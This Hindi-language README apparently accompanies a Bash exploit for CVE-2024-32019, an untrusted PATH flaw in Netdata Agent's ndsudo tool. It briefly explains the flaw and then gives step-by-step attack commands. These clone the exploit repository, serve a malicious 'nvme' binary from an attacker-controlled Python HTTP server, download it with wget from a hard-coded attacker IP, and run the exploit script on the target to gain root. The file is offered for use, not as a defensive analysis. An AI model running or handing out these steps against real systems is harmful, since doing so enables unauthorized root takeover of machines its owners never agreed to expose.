
Bash-आधारित विशेषाधिकार वृद्धि शोषण CVE-2024-32019 के लिए Netdata Agent के ndsudo टूल में, अविश्वसनीय PATH खोज का लाभ उठाकर रूट अनुमतियों के साथ मनमाने बाइनरी निष्पादित करता है।
ndsudo भेद्यता एक हमलावर को ndsudo टूल में एक अविश्वसनीय खोज पथ का फायदा उठाकर रूट अनुमतियाँ प्राप्त करने की अनुमति देती है, जो Netdata Agent का हिस्सा है। यदि हमलावर किसी लिखने-योग्य निर्देशिका में एक दुर्भावनापूर्ण बाइनरी रखता है और तदनुसार PATH पर्यावरण चर को संशोधित करता है, तो यह ऊँचे विशेषाधिकारों के साथ मनमाने प्रोग्रामों के निष्पादन को सक्षम कर सकता है।
CVE-2024-32019 के रूप में पहचानी गई ndsudo भेद्यता, Netdata Agent के साथ शामिल ndsudo टूल के संस्करणों को प्रभावित करती है, विशेष रूप से v1.45.0 और उससे नीचे के संस्करणों को। यह भेद्यता हमलावरों को उन प्रणालियों पर विशेषाधिकार बढ़ाने की अनुमति देती है जहाँ टूल स्थापित है।
भेद्यता कैसे काम करती है:
शोषण का तंत्र:-
अविश्वसनीय खोज पथ: ndsudo टूल बाहरी कमांडों का पता लगाने के लिए PATH पर्यावरण चर का उपयोग करता है। एक हमलावर इस चर को अपने नियंत्रण वाली निर्देशिका की ओर इंगित करने के लिए हेरफेर कर सकता है।
दुर्भावनापूर्ण बाइनरी का निष्पादन: ndsudo को चलाने की अनुमति वाले कमांड (जैसे nvme) के समान नाम वाली एक दुर्भावनापूर्ण निष्पादन योग्य फ़ाइल को लिखने-योग्य निर्देशिका में रखकर, हमलावर रूट अनुमतियों के साथ मनमाना कोड निष्पादित कर सकता है।
हमले की जटिलता:-
भेद्यता का प्रभाव:-
विशेषाधिकार वृद्धि: सफल शोषण हमलावर को रूट एक्सेस प्राप्त करने की अनुमति देता है, जो प्रभावित प्रणाली पर पूर्ण नियंत्रण की स्थिति पैदा कर सकता है।
संभावित जोखिम: इसके परिणामस्वरूप अनधिकृत डेटा एक्सेस, सिस्टम हेरफेर, और नेटवर्क संसाधनों का आगे शोषण हो सकता है।
विशेषाधिकार वृद्धि मैंने उपयोगकर्ता से रूट तक आसानी से एक्सेस प्राप्त करने के लिए दो bash स्क्रिप्ट बनाई हैं। नीचे दिए गए चरणों का पालन करें :-
git clone https://github.com/justjoeyking/CVE-2024-32019-ndsudo.git
cd CVE-2024-32019-ndsudo
chmod +x ndsudo_exp.sh
अब python सर्वर बनाएं :
python3 -m http.server 8080
ndsudo_exploit.sh फ़ाइल को gedit या pluma, जो भी उपलब्ध हो, का उपयोग करके खोलें। आपको इस प्रकार का wget कमांड दिखाई देगा :
wget http://10.10.14.70:8080/nvme -o /tmp/nvme
IP-address को अपनी मशीन के IP में बदलें
अब टारगेट मशीन पर जाएं, टर्मिनल खोलें और निम्नलिखित करें:
wget http://<your-ip-addr>:8080/ndsudo_exploit.sh
chmod +x ndsudo_exploit.sh
./ndsudo_exploit.sh